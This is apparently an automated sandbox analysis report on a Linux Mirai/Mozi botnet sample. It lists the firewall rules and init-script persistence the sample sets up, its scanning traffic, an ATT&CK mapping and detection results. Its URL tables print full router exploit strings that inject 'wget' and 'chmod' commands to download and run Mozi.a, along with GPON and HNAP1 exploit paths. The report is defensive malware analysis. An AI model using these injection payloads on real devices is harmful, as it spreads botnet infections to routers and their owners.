              Source: /bin/sh (PID: 5249)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28537 -j ACCEPT
              Source: /bin/sh (PID: 5282)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28537 -j ACCEPT
              Source: /bin/sh (PID: 5315)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28537 -j ACCEPT
              Source: /tmp/i (PID: 4589)Reads from proc file: /proc/statJump to behavior
              Source: /tmp/i (PID: 4562)File: /usr/networks (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/i (PID: 4562)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/i (PID: 4562)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/i (PID: 4562)File written: /usr/networksJump to dropped file
              Source: /tmp/i (PID: 4562)Shell script file created: /etc/rcS.d/S95baby.shJump to dropped file
              Source: /tmp/i (PID: 4562)Shell script file created: /etc/init.d/S95baby.shJump to dropped file
              Source: submitted sampleStderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705qemu: uncaught target signal 4 (Illegal instruction) - core dumpedUnsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Drops files in suspicious directoriesShow sources
              Source: /tmp/i (PID: 4562)File: /etc/init.d/S95baby.shJump to dropped file
              Source: /tmp/i (PID: 4562)File: /etc/init.d/mountall.shJump to dropped file
              Source: /tmp/i (PID: 4562)File: /etc/init.d/checkfs.shJump to dropped file
              Source: /tmp/i (PID: 4562)File: /etc/init.d/umountnfs.shJump to dropped file
              Source: /tmp/i (PID: 4562)File: /etc/init.d/mountkernfs.shJump to dropped file
              Source: /tmp/i (PID: 4562)File: /etc/init.d/checkroot-bootclean.shJump to dropped file
              Source: /tmp/i (PID: 4562)File: /etc/init.d/mountnfs-bootclean.shJump to dropped file
              Source: /tmp/i (PID: 4562)File: /etc/init.d/bootmisc.shJump to dropped file
              Source: /tmp/i (PID: 4562)File: /etc/init.d/checkroot.shJump to dropped file
              Source: /tmp/i (PID: 4562)File: /etc/init.d/hwclock.shJump to dropped file
              Source: /tmp/i (PID: 4562)File: /etc/init.d/hostname.shJump to dropped file
              Source: /tmp/i (PID: 4562)File: /etc/init.d/mountdevsubfs.shJump to dropped file
              Source: /tmp/i (PID: 4562)File: /etc/init.d/mountall-bootclean.shJump to dropped file
              Source: /tmp/i (PID: 4562)File: /etc/init.d/mountnfs.shJump to dropped file
              Source: /tmp/i (PID: 4562)File: /usr/bin/gettext.shJump to dropped file
              Source: /tmp/i (PID: 4562)File: /usr/sbin/alsa-info.shJump to dropped file
              Uses known network protocols on non-standard portsShow sources
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 52228 -> 49152
              Source: unknownNetwork traffic detected: HTTP traffic on port 49152 -> 52228
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 44712 -> 7574
              Source: unknownNetwork traffic detected: HTTP traffic on port 7574 -> 44712
              Source: unknownNetwork traffic detected: HTTP traffic on port 48440 -> 7574
              Source: unknownNetwork traffic detected: HTTP traffic on port 48440 -> 7574
              Source: unknownNetwork traffic detected: HTTP traffic on port 48440 -> 7574
              Source: unknownNetwork traffic detected: HTTP traffic on port 48440 -> 7574
              Source: unknownNetwork traffic detected: HTTP traffic on port 48440 -> 7574
              Source: unknownNetwork traffic detected: HTTP traffic on port 48440 -> 7574
              Source: unknownNetwork traffic detected: HTTP traffic on port 48440 -> 7574
              Source: unknownNetwork traffic detected: HTTP traffic on port 48440 -> 7574
              Source: /tmp/i (PID: 4547)Queries kernel information via 'uname':
              Source: /tmp/i (PID: 4562)Queries kernel information via 'uname':
              Source: /tmp/i (PID: 4585)Queries kernel information via 'uname':
              Source: /sbin/modprobe (PID: 4621)Queries kernel information via 'uname':
              Source: /usr/share/apport/apport-gtk (PID: 4813)Queries kernel information via 'uname':
              Source: /usr/share/apport/apport-gtk (PID: 4832)Queries kernel information via 'uname':
              Source: kvm-test-1-run.sh.6.drBinary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
              Source: functions.sh0.6.drBinary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
              Source: kvm-test-1-run.sh.6.drBinary or memory string: kill -KILL $qemu_pid
              Source: functions.sh0.6.drBinary or memory string: qemu-system-ppc64)
              Source: kvm-test-1-run.sh.6.drBinary or memory string: echo Monitoring qemu job at pid $qemu_pid
              Source: kvm.sh.6.drBinary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
              Source: kvm-test-1-run.sh.6.drBinary or memory string: qemu_pid=$!
              Source: kvm-test-1-run.sh.6.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
              Source: functions.sh0.6.drBinary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
              Source: kvm-recheck-lock.sh.6.drBinary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
              Source: kvm-test-1-run.sh.6.drBinary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
              Source: kvm-test-1-run.sh.6.drBinary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
              Source: functions.sh0.6.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
              Source: kvm.sh.6.drBinary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
              Source: functions.sh0.6.drBinary or memory string: identify_qemu_append () {
              Source: kvm-test-1-run.sh.6.drBinary or memory string: echo Grace period for qemu job at pid $qemu_pid
              Source: functions.sh0.6.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
              Source: kvm-test-1-run.sh.6.drBinary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
              Source: functions.sh0.6.drBinary or memory string: # Returns our best guess as to which qemu command is appropriate for
              Source: kvm.sh.6.drBinary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
              Source: kvm-test-1-run.sh.6.drBinary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
              Source: kvm-test-1-run.sh.6.drBinary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
              Source: functions.sh0.6.drBinary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
              Source: functions.sh0.6.drBinary or memory string: identify_qemu_args () {
              Source: kvm-test-1-run.sh.6.drBinary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
              Source: functions.sh0.6.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
              Source: kvm-test-1-run.sh.6.drBinary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
              Source: kvm-test-1-run.sh.6.drBinary or memory string: # Generate -smp qemu argument.
              Source: kvm-test-1-run.sh.6.drBinary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
              Source: functions.sh0.6.drBinary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
              Source: functions.sh0.6.drBinary or memory string: # Output arguments for the qemu "-append" string based on CPU type
              Source: kvm.sh.6.drBinary or memory string: --qemu-args|--qemu-arg)
              Source: kvm.sh.6.drBinary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
              Source: functions.sh0.6.drBinary or memory string: echo $TORTURE_QEMU_CMD
              Source: kvm.sh.6.drBinary or memory string: TORTURE_QEMU_MAC=$2
              Source: kvm.sh.6.drBinary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
              Source: kvm-test-1-run.sh.6.drBinary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
              Source: functions.sh0.6.drBinary or memory string: specify_qemu_cpus () {
              Source: kvm-test-1-run.sh.6.drBinary or memory string: vcpus=`identify_qemu_vcpus`
              Source: functions.sh0.6.drBinary or memory string: echo qemu-system-ppc64
              Source: functions.sh0.6.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
              Source: kvm.sh.6.drBinary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
              Source: functions.sh0.6.drBinary or memory string: qemu-system-ppc64)
              Source: functions.sh0.6.drBinary or memory string: # identify_boot_image qemu-cmd
              Source: kvm.sh.6.drBinary or memory string: TORTURE_QEMU_ARG="$2"
              Source: kvm-recheck-rcu.sh.6.drBinary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
              Source: functions.sh0.6.drBinary or memory string: # identify_qemu_append qemu-cmd
              Source: functions.sh0.6.drBinary or memory string: identify_qemu_vcpus () {
              Source: functions.sh0.6.drBinary or memory string: # qemu-args already contains "-smp".
              Source: kvm-test-1-run.sh.6.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
              Source: functions.sh0.6.drBinary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
              Source: functions.sh0.6.drBinary or memory string: echo Cannot figure out what qemu command to use! 1>&2
              Source: functions.sh0.6.drBinary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
              Source: functions.sh0.6.drBinary or memory string: # identify_qemu_vcpus
              Source: kvm.sh.6.drBinary or memory string: TORTURE_QEMU_CMD="$2"
              Source: functions.sh0.6.drBinary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
              Source: functions.sh0.6.drBinary or memory string: # identify_qemu_args qemu-cmd serial-file
              Source: functions.sh0.6.drBinary or memory string: if test -n "$TORTURE_QEMU_CMD"
              Source: kvm.sh.6.drBinary or memory string: --qemu-cmd)
              Source: kvm.sh.6.drBinary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
              Source: kvm-test-1-run.sh.6.drBinary or memory string: qemu_args=$5
              Source: kvm-test-1-run.sh.6.drBinary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
              Source: kvm-test-1-run.sh.6.drBinary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
              Source: kvm-test-1-run.sh.6.drBinary or memory string: # Generate qemu -append arguments
              Source: functions.sh0.6.drBinary or memory string: # identify_qemu builddir
              Source: functions.sh0.6.drBinary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
              Source: kvm-test-1-run.sh.6.drBinary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
              Source: functions.sh0.6.drBinary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
              Source: kvm.sh.6.drBinary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
              Source: functions.sh0.6.drBinary or memory string: echo qemu-system-i386
              Source: functions.sh0.6.drBinary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
              Source: functions.sh0.6.drBinary or memory string: echo qemu-system-x86_64
              Source: functions.sh0.6.drBinary or memory string: identify_qemu () {

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsCommand and Scripting Interpreter1.bash_profile and .bashrc1.bash_profile and .bashrc1Masquerading1OS Credential Dumping1Security Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Standard Port11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScripting12At (Linux)1At (Linux)1File and Directory Permissions Modification1Brute Force1Remote System Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)1Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerSystem Network Configuration Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 336769 Sample: i Startdate: 06/01/2021 Architecture: LINUX Score: 100 91 185.70.34.103, 49152 NSUKGB United Kingdom 2->91 93 148.162.250.199, 37215 CompaniaDominicanadeTelefonosSADO United States 2->93 95 103 other IPs or domains 2->95 99 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->99 101 Antivirus detection for dropped file 2->101 103 Antivirus / Scanner detection for submitted sample 2->103 105 7 other signatures 2->105 12 i 2->12         started        14 upstart sh 2->14         started        16 upstart sh 2->16         started        18 upstart sh 2->18         started        signatures3 process4 process5 20 i 12->20         started        22 sh date 14->22         started        24 sh apport-checkreports 14->24         started        26 sh date 16->26         started        28 sh apport-gtk 16->28         started        30 sh date 18->30         started        32 sh apport-gtk 18->32         started        process6 34 i 20->34         started        file7 83 /usr/src/linux-hea...-116/zfs/autogen.sh, ASCII 34->83 dropped 85 /usr/src/linux-hea...slabinfo-gnuplot.sh, ASCII 34->85 dropped 87 /usr/src/linux-hea...sb/usbip/cleanup.sh, ASCII 34->87 dropped 89 207 other malicious files 34->89 dropped 107 Sample tries to persist itself using /etc/profile 34->107 109 Drops files in suspicious directories 34->109 111 Sample reads /proc/mounts (often used for finding a writable filesystem) 34->111 113 Sample tries to persist itself using System V runlevels 34->113 38 i 34->38         started        41 i sh 34->41         started        43 i sh 34->43         started        45 30 other processes 34->45 signatures8 process9 signatures10 119 Opens /proc/net/* files useful for finding connected devices and routers 38->119 47 i sh 38->47         started        49 i sh 38->49         started        51 i sh 38->51         started        62 5 other processes 38->62 53 sh killall 41->53         started        56 sh iptables 43->56         started        58 sh iptables 45->58         started        60 sh iptables 45->60         started        64 21 other processes 45->64 process11 signatures12 66 sh iptables 47->66         started        69 sh iptables 49->69         started        71 sh iptables 51->71         started        115 Terminates several processes with shell command 'killall' 53->115 117 Executes the "iptables" command to insert, remove and/or manipulate rules 56->117 73 sh iptables 62->73         started        75 sh iptables 62->75         started        77 sh iptables 62->77         started        79 2 other processes 62->79 process13 signatures14 97 Executes the "iptables" command to insert, remove and/or manipulate rules 66->97 81 iptables modprobe 66->81         started        process15

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              i65%VirustotalBrowse
              i69%ReversingLabsLinux.Trojan.Mirai
              i100%AviraLINUX/Mirai.lldau

              Dropped Files

              SourceDetectionScannerLabelLink
              /usr/networks100%AviraLINUX/Mirai.lldau
              /usr/networks69%ReversingLabsLinux.Trojan.Mirai

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://pastebin.ca)0%Avira URL Cloudsafe
              http://%s:%d/bin.sh;chmod0%Avira URL Cloudsafe
              http://%s:%d/Mozi.a;chmod0%Avira URL Cloudsafe
              http://127.0.0.1:80/GponForm/diag_Form?images/0%VirustotalBrowse
              http://127.0.0.1:80/GponForm/diag_Form?images/0%Avira URL Cloudsafe
              http://127.0.0.1:7574/UD/act?10%Avira URL Cloudsafe
              http://127.0.0.1:8080/GponForm/diag_Form?images/0%Avira URL Cloudsafe
              http://%s:%d/Mozi.m;$0%Avira URL Cloudsafe
              http://178.88.225.33:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
              http://13.249.130.85:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
              http://71.41.225.74:80/HNAP1/0%Avira URL Cloudsafe
              http://127.0.0.10%Avira URL Cloudsafe
              http://www.alsa-project.org0%Avira URL Cloudsafe
              http://%s:%d/Mozi.m0%Avira URL Cloudsafe
              http://www.alsa-project.org/cardinfo-db/0%Avira URL Cloudsafe
              http://85.214.105.212:80/HNAP1/0%Avira URL Cloudsafe
              http://103.47.16.235:80/HNAP1/0%Avira URL Cloudsafe
              http://127.0.0.1sendcmd0%Avira URL Cloudsafe
              http://139.39.140.28:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
              http://81.6.188.111:80/HNAP1/0%Avira URL Cloudsafe
              http://139.162.182.70:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
              http://92.246.94.253:80/HNAP1/0%Avira URL Cloudsafe
              http://23.214.76.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
              http://%s:%d/Mozi.m;/tmp/Mozi.m0%Avira URL Cloudsafe
              http://23.210.67.167:80/HNAP1/0%Avira URL Cloudsafe
              http://%s:%d/bin.sh0%Avira URL Cloudsafe
              http://purenetworks.com/HNAP1/0%Avira URL Cloudsafe
              http://www.alsa-project.org/alsa-info.sh0%Avira URL Cloudsafe
              http://%s:%d/Mozi.m;0%Avira URL Cloudsafe
              http://www.alsa-project.org.0%Avira URL Cloudsafe
              http://HTTP/1.10%Avira URL Cloudsafe
              http://%s:%d/Mozi.a;sh$0%Avira URL Cloudsafe
              http://167.82.102.91:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              dht.transmissionbt.com
              		212.129.33.59
              		truefalse
                		high
                bttracker.acc.umu.se
                		130.239.18.159
                		truefalse
                  		high
                  router.bittorrent.com
                  		67.215.246.10
                  		truefalse
                    		high
                    router.utorrent.com
                    		82.221.103.244
                    		truefalse
                      		high
                      bttracker.debian.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:80/GponForm/diag_Form?images/true
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://127.0.0.1:7574/UD/act?1false
                        • Avira URL Cloud: safe
                        		unknown
                        http://127.0.0.1:8080/GponForm/diag_Form?images/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://178.88.225.33:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://13.249.130.85:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://71.41.225.74:80/HNAP1/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://85.214.105.212:80/HNAP1/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://103.47.16.235:80/HNAP1/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://139.39.140.28:49152/soap.cgi?service=WANIPConn1true
                        • Avira URL Cloud: safe
                        		unknown
                        http://81.6.188.111:80/HNAP1/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://139.162.182.70:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://92.246.94.253:80/HNAP1/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.214.76.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.210.67.167:80/HNAP1/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://167.82.102.91:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://pastebin.ca)alsa-info.sh0.6.drtrue
                        • Avira URL Cloud: safe
                        		low
                        http://%s:%d/bin.sh;chmoditrue
                        • Avira URL Cloud: safe
                        		low
                        http://%s:%d/Mozi.a;chmoditrue
                        • Avira URL Cloud: safe
                        		low
                        http://schemas.xmlsoap.org/soap/encoding/ifalse
                          		high
                          http://%s:%d/Mozi.m;$itrue
                          • Avira URL Cloud: safe
                          		low
                          http://schemas.xmlsoap.org/soap/envelope/ifalse
                            		high
                            http://127.0.0.1ifalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://baidu.com/%s/%s/%d/%s/%s/%s/%s)ifalse
                              		high
                              http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/.config.6.drfalse
                                		high
                                http://www.alsa-project.orgalsa-info.sh0.6.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.pastebin.ca/upload.phpalsa-info.sh0.6.drfalse
                                  		high
                                  http://%s:%d/Mozi.mitrue
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.alsa-project.org/cardinfo-db/alsa-info.sh0.6.drtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://127.0.0.1sendcmdifalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEYalsa-info.sh0.6.drfalse
                                    		high
                                    http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblahalsa-info.sh0.6.drfalse
                                      		high
                                      http://ipinfo.io/ipifalse
                                        		high
                                        http://%s:%d/Mozi.m;/tmp/Mozi.mitrue
                                        • Avira URL Cloud: safe
                                        		low
                                        http://%s:%d/bin.shitrue
                                        • Avira URL Cloud: safe
                                        		low
                                        http://www.pastebin.caalsa-info.sh0.6.drfalse
                                          		high
                                          http://purenetworks.com/HNAP1/ifalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.alsa-project.org/alsa-info.shalsa-info.sh0.6.drtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://%s:%d/Mozi.m;itrue
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.alsa-project.org.alsa-info.sh0.6.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://HTTP/1.1ifalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://%s:%d/Mozi.a;sh$itrue
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.pastebin.ca.alsa-info.sh0.6.drfalse
                                            		high
                                            http://schemas.xmlsoap.org/soap/envelope//ifalse
                                              		high

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              208.237.78.155
                                              		unknownUnited States
                                              		4208THE-ISERV-COMPANYUSfalse
                                              73.112.48.171
                                              		unknownUnited States
                                              		7922COMCAST-7922USfalse
                                              157.88.175.0
                                              		unknownSpain
                                              		766REDIRISRedIRISAutonomousSystemESfalse
                                              1.223.141.144
                                              		unknownKorea Republic of
                                              		3786LGDACOMLGDACOMCorporationKRfalse
                                              33.226.164.157
                                              		unknownUnited States
                                              		2686ATGS-MMD-ASUSfalse
                                              166.179.32.229
                                              		unknownUnited States
                                              		20057ATT-MOBILITY-LLC-AS20057USfalse
                                              115.41.126.154
                                              		unknownKorea Republic of
                                              		10066GAYANET-AS-KRLGHelloVisionCorpKRfalse
                                              152.107.5.68
                                              		unknownSouth Africa
                                              		36994Vodacom-VBZAfalse
                                              130.49.72.137
                                              		unknownUnited States
                                              		4130UPITT-ASUSfalse
                                              212.170.239.6
                                              		unknownSpain
                                              		6813FLEXNETTelefonicaSolucionesESfalse
                                              11.32.2.138
                                              		unknownUnited States
                                              		3356LEVEL3USfalse
                                              20.13.123.136
                                              		unknownUnited States
                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                              173.151.118.105
                                              		unknownUnited States
                                              		10507SPCSUSfalse
                                              42.89.43.188
                                              		unknownChina
                                              		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                              85.71.193.222
                                              		unknownCzech Republic
                                              		5610O2-CZECH-REPUBLICCZfalse
                                              139.183.125.68
                                              		unknownChina
                                              		2152CSUNET-NWUSfalse
                                              64.57.12.117
                                              		unknownUnited States
                                              		15213THIGNETUSfalse
                                              138.177.58.109
                                              		unknownUnited States
                                              		721DNIC-ASBLK-00721-00726USfalse
                                              108.218.216.192
                                              		unknownUnited States
                                              		7018ATT-INTERNET4USfalse
                                              20.137.220.37
                                              		unknownUnited States
                                              		4237CSC-IGN-FTWUSfalse
                                              145.223.153.219
                                              		unknownNetherlands
                                              		44074VBA-ASNLfalse
                                              29.78.6.226
                                              		unknownUnited States
                                              		7922COMCAST-7922USfalse
                                              146.5.204.214
                                              		unknownUnited States
                                              		11711TULAROSA-COMMUNICATIONSUSfalse
                                              188.244.183.222
                                              		unknownRussian Federation
                                              		15774TTK-RTLRetailRUfalse
                                              202.33.171.73
                                              		unknownJapan4725ODNSoftBankMobileCorpJPfalse
                                              166.215.169.118
                                              		unknownUnited States
                                              		20057ATT-MOBILITY-LLC-AS20057USfalse
                                              26.100.71.227
                                              		unknownUnited States
                                              		7922COMCAST-7922USfalse
                                              46.68.162.239
                                              		unknownUnited Kingdom
                                              		12576EELtdGBfalse
                                              125.92.238.56
                                              		unknownChina
                                              		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                              60.6.50.171
                                              		unknownChina
                                              		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                              114.53.240.254
                                              		unknownKorea Republic of
                                              		17583KCNNET-AS-KRKeumgangCableNetworkKRfalse
                                              141.26.145.32
                                              		unknownGermany
                                              		2857RLP-NETDEfalse
                                              200.147.110.20
                                              		unknownBrazil
                                              		7162UniversoOnlineSABRfalse
                                              120.187.198.153
                                              		unknownIndonesia
                                              		4761INDOSAT-INP-APINDOSATInternetNetworkProviderIDfalse
                                              65.73.82.146
                                              		unknownUnited States
                                              		7011FRONTIER-AND-CITIZENSUSfalse
                                              197.144.154.30
                                              		unknownMorocco
                                              		36884MAROCCONNECTMAfalse
                                              34.196.39.11
                                              		unknownUnited States
                                              		14618AMAZON-AESUSfalse
                                              156.130.158.103
                                              		unknownUnited States
                                              		29975VODACOM-ZAfalse
                                              179.204.129.228
                                              		unknownBrazil
                                              		26615TIMSABRfalse
                                              28.173.173.36
                                              		unknownUnited States
                                              		7922COMCAST-7922USfalse
                                              9.10.22.243
                                              		unknownUnited States
                                              		3356LEVEL3USfalse
                                              131.252.63.108
                                              		unknownUnited States
                                              		6366PDXNETUSfalse
                                              115.23.113.40
                                              		unknownKorea Republic of
                                              		4766KIXS-AS-KRKoreaTelecomKRfalse
                                              146.193.54.100
                                              		unknownPortugal
                                              		5516INESCLisboaPortugalPTfalse
                                              15.16.85.120
                                              		unknownUnited States
                                              		13979ATT-IPFRUSfalse
                                              23.68.17.106
                                              		unknownUnited States
                                              		7922COMCAST-7922USfalse
                                              133.167.102.52
                                              		unknownJapan9371SAKURA-CSAKURAInternetIncJPfalse
                                              119.157.148.99
                                              		unknownPakistan
                                              		45595PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPKfalse
